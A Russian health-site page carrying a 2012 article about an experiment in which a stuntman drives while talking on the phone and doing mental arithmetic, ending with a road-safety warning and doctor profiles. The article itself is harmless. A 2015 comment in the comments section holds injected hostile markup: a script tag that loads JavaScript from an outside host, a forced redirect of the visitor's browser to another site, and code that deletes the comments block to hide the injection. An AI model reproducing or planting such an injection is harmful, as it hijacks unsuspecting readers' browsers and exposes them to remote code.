Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Эксперимент с каскадером  >>  Эксперимент с каскадером
 
Обратная связь
 

Эксперимент с каскадером

Размер шрифта
26 февраля 2012 01:58
  • google_analytics: false
  • Нравится

Водить машину и при этом говорить по телефону? «Без проблем», - ответят многие из нас. Программа «Здоровье» решила провести эксперимент с участием каскадера, Алексея Козлова, и проверить, легко ли это, быть Юлием Цезарем и делать несколько дел одновременно.

1

Досье: Алексей Козлов – профессиональный каскадер, водитель с большим стажем вождения. Участвовал в постановке трюков для голливудского боевика «Идентификация Борна». С легкостью водит автомобиль даже в самых экстремальных условиях.

Задача Алексея – не просто вести автомобиль, но одновременно выполнять и другие задания.

Первый этап эксперимента

Разговор по телефону во время процесса вождения не доставляет Алексею неудобств. Но вот задача усложняется: на дороге появляются преграды, их надо объезжать, продолжая говорить по телефону.

Результат первого этапа: вести автомобиль у Алексея получилось гораздо хуже, чем он сам ожидал.

Второй этап эксперимента

Задача усложняется. Теперь по телефону Алексею предложено решать несложные математические примеры и запоминать кодовые слова после каждого примера. По окончании решения примеров Алексей должен вспомнить эти слова в правильной последовательности.

Пример: 8 х 4 + 2 = 30?

Ответ Алексея: Нет

Слово - дом

Пример: 9 х 3 – 3 = 30?

Ответ Алексея: Нет

Слово - минт

Пример: 4 : 1+ 1 = 5?

Ответ Алексея: Да

Слово - сила

Повтор слов: дом, минт, сила

Пример: 3 : 1 – 1 = 2?

Ответ Алексея: Да

Слово - лед

Пример: 2 х 2 +2 = 4?

Ответ Алексея: Нет

Слово - сова

Пример: 9 х 2 + 2 = 20?

Ответ Алексея: Да

Слово - игрушка

Повтор слов: лед… не помню… игрушка

Результат второго этапа: решая примеры и запоминая слова, человек практически не участвует в процессе вождения автомобиля.

Пояснение к тесту

За решение математических примеров отвечает теменная доля большого мозга (Parietal Lobe), а за память – лобная доля большого мозга (Frontal Lobe). При этом затылочная, или оксипитальная (Occipital Lobe), доля большого мозга обеспечивает возможность видеть, чувствовать пространство и безопасно вести машину.

Если человек разговаривает по телефону во время вождения, у него одновременно работают те же части мозга. Но если в мозг поступает много сигналов, обрабатывается как следует только один, и качество всех остальных действий снижается.

Результат эксперимента

Эксперимент завершен, и каскадер узнал о себе две новости: хорошую и плохую.

Сидя за рулем автомобиля и одновременно пытаясь делать еще несколько вещей, Алексей показал такие же результаты вождения, как и 98% людей. Несмотря на то что каскадер считал себя специалистом по выполнению нескольких дел одновременно, его конечный результат оказался средним, как и у большинства людей, что является физиологической и психической нормой.

Качество вождения ухудшалось с каждым новым заданием. Более того, Алексей хуже разговаривал по телефону, был рассеянным и не мог сосредоточиться на разговоре, когда его внимание переключалось на вождение автомобиля.

Предупреждение

Отключение внимания за рулем хотя бы на несколько секунд может привести к тяжелейшим последствиям. Врачи знают лучше других, что автомобильные травмы являются самыми тяжелыми и зачастую несовместимыми с жизнью. Любое правило безопасности на дороге кому-то стоило жизни. Так что не спешите ставить на себе эксперименты – жизнь вещь одноразовая. Берегите себя! 

 

Сюжет по теме:
Можно ли безопасно управлять автомобилем, разговаривая по телефону?

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.